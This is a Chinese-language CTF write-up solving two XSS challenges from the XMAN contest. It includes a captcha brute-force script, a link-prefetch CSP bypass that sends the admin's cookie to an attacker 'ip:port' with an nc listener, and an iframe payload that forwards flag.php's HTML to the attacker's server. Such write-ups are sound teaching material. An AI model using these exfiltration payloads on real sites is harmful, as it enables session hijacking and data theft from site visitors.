0x01 前言

讲道理，之前每次遇到xss的题就很发憷，因为不会呀，这次XMAN个人排位赛的两道xss赛题让我对于xss有了更深入的认识，这里整理一下writeup

0x02 xss1

首先，进入页面

是一个留言框，下面有一个md5后四位的校验码
然后写了一个python脚本用来生成校验码

import hashlib
for i in range(1000000):
    if hashlib.md5(str(i)).hexdigest()[:4]=='cdc1':
       print i 
       break

留言板嘛，很容易想到是xss，先用

<script>alert(1)</script>

试了一下，果然能弹窗，xss无疑了，并且发现这里的我写的语句只是单纯的被输出到了页面里，这样应该是一个非常简单的xss利用了。

然后fuzz了一下，发现这里没有过滤任何参数，所以很适合我这种新手呀。。。。
通过抓包看到的resoponse包的header，我们能够发现他的csp策略，定义了所以来源都要跟与本页面同源，因此可以用link预加载标签进行绕过。关于CSP的学习和绕过可以参考这篇文章http://www.jianshu.com/p/f1de775bc43e

然后写利用的js代码

<script>
var i=document.createElement("link");
i.setAttribute("rel","prefetch");
i.setAttribute("href","https://ip:port/?"+document.cookie);
document.head.appendChild(i);
</script>

在我们的服务器上，要

nc -l port

在href的属性里填写自己的服务器的ip和端口，这段代码的意思就是当对方admin查看我们的留言之后，就会自动的访问我们的服务器，服务器通过监听端口，来得到admin的cookie值。这里在admin的cookie中得到了flag

0x03xss2

打开页面，还是熟悉的页面，还是熟悉的套路。不过这次更难一些。
这里还是脚本跑验证码，然后发送留言，burp抓包发现这次没有这个CSP策略，fuzz之后发现他把单引号替换成了_下划线，所以可以利用双引号进行绕过。用上个xss的脚本打过去发现这次没有返回cookie。。想到了今年国赛有道xss的题也是没有cookie返回的题，又想到题目描述中说flag在flag.php里面，然后发现只有管理员才能访问flag.php，那么就很明显了，让admin用iframe打开一个flag.php的子窗口，然后子窗口中链接到我的服务器，这样就能将消息带给我了，我就能收到flag了。

<iframe id="test" src="http://202.112.51.217:43424/flag.php(这里是flag所在)" onload="test()"></iframe>
<script>
function test(){
  parent.window["location"].href="http://ip:port/?"+escape(document.getElementById("test").contentWindow.document.documentElement.outerHTML )
}
</script>

然后得到flag